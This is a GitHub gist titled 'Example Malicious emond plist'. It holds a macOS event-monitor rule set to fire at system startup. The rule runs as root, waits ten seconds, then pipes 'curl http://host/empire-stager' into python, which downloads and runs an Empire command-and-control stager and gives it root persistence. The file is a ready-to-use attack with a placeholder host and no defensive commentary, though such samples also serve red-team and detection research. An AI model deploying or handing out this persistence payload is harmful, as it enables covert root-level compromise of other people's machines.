Skip to content

Instantly share code, notes, and snippets.

@xorrior
Last active January 21, 2020 16:47
Show Gist options
  • Save xorrior/4c80abf0bf396ba93276ebb84abac54d to your computer and use it in GitHub Desktop.
Save xorrior/4c80abf0bf396ba93276ebb84abac54d to your computer and use it in GitHub Desktop.
Example Malicious emond plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>empire rules</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>10</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/bin/bash</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-c</string>
<string>curl 'http://host/empire-stager' | python &amp;</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment